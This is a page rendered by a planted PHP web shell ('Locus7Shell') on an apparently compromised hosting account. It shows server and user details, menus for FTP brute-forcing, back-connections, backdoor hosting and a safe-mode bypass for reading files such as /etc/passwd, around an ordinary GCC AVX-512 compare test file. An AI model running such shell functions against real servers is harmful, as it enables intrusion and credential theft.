Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/i386/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     avx512f-vpcmpud-2.c (2.37 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* { dg-do run } */
/* { dg-options "-O2 -mavx512f" } */
/* { dg-require-effective-target avx512f } */

#define AVX512F

#include "avx512f-helper.h"

#include <math.h>
#define SIZE (AVX512F_LEN / 32)
#include "avx512f-mask-type.h"

#if AVX512F_LEN == 512
#undef CMP
#define CMP(imm, rel)                    \
    dst_ref = 0;                    \
    for (i = 0; i < 16; i++)                \
    {                            \
      dst_ref = ((rel) << i) | dst_ref;            \
    }                            \
    source1.x = _mm512_loadu_si512 (s1);        \
    source2.x = _mm512_loadu_si512 (s2);        \
    dst1 = _mm512_cmp_epu32_mask (source1.x, source2.x, imm);\
    dst2 = _mm512_mask_cmp_epu32_mask (mask, source1.x, source2.x, imm);\
    if (dst_ref != dst1) abort();            \
    if ((mask & dst_ref) != dst2) abort();
#endif

#if AVX512F_LEN == 256
#undef CMP
#define CMP(imm, rel)                    \
    dst_ref = 0;                    \
    for (i = 0; i < 8; i++)                \
    {                            \
      dst_ref = ((rel) << i) | dst_ref;            \
    }                            \
    source1.x = _mm256_loadu_si256 ((__m256i*)s1);        \
    source2.x = _mm256_loadu_si256 ((__m256i*)s2);        \
    dst1 = _mm256_cmp_epu32_mask (source1.x, source2.x, imm);\
    dst2 = _mm256_mask_cmp_epu32_mask (mask, source1.x, source2.x, imm);\
    if (dst_ref != dst1) abort();            \
    if ((mask & dst_ref) != dst2) abort();
#endif

#if AVX512F_LEN == 128
#undef CMP
#define CMP(imm, rel)                    \
    dst_ref = 0;                    \
    for (i = 0; i < 4; i++)                \
    {                            \
      dst_ref = ((rel) << i) | dst_ref;            \
    }                            \
    source1.x = _mm_loadu_si128 ((__m128i*)s1);        \
    source2.x = _mm_loadu_si128 ((__m128i*)s2);        \
    dst1 = _mm_cmp_epu32_mask (source1.x, source2.x, imm);\
    dst2 = _mm_mask_cmp_epu32_mask (mask, source1.x, source2.x, imm);\
    if (dst_ref != dst1) abort();            \
    if ((mask & dst_ref) != dst2) abort();
#endif

void
TEST ()
{
    unsigned int s1[16] = {2134,  6678,  453, 54646,
              231, 5674,  111, 23241,
              12314,  145,  671, 77575,
              23455,  166, 5321, 5673};
    unsigned int s2[16] = {41124, 6678, 8653,   856,
              231, 4646,  111,   124,
              2745, 4567, 3676,   123,
              714, 3589, 5683,  5673};
    UNION_TYPE (AVX512F_LEN, i_d) source1, source2;
    MASK_TYPE dst1, dst2, dst_ref;
    MASK_TYPE mask = MASK_VALUE;
    int i;

    CMP(0x00, s1[i] == s2[i]);
    CMP(0x01, s1[i] < s2[i]);
    CMP(0x02, s1[i] <= s2[i]);
    CMP(0x03, 0);
    CMP(0x04, s1[i] != s2[i]);
    CMP(0x05, s1[i] >= s2[i]);
    CMP(0x06, s1[i] > s2[i]);
    CMP(0x07, 1);
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0061 ]--